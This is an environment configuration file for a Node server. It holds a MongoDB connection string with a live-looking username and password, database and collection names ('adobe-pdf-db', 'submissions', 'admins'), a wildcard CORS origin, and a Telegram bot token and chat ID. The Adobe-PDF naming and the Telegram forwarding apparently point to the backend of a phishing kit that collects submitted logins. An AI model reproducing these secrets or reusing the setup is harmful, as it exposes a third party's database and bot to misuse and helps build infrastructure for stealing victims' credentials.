# MongoDB Connection String
MONGO_URI=mongodb+srv://suzanne_db_user:TIpJuYBLlnM3TQOO@cluster0.oa5wtke.mongodb.net/?appName=Cluster0

# Database Configuration
DB_NAME=adobe-pdf-db
USERS_COLLECTION=submissions
ADMINS_COLLECTION=admins

# Server
PORT=5000
NODE_ENV=development

# CORS
CORS_ORIGIN=*

# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=8635062176:AAHtQkW-yt--teUU4UnDbDcQRbhIK8r1jlc
TELEGRAM_CHAT_ID=6461049894
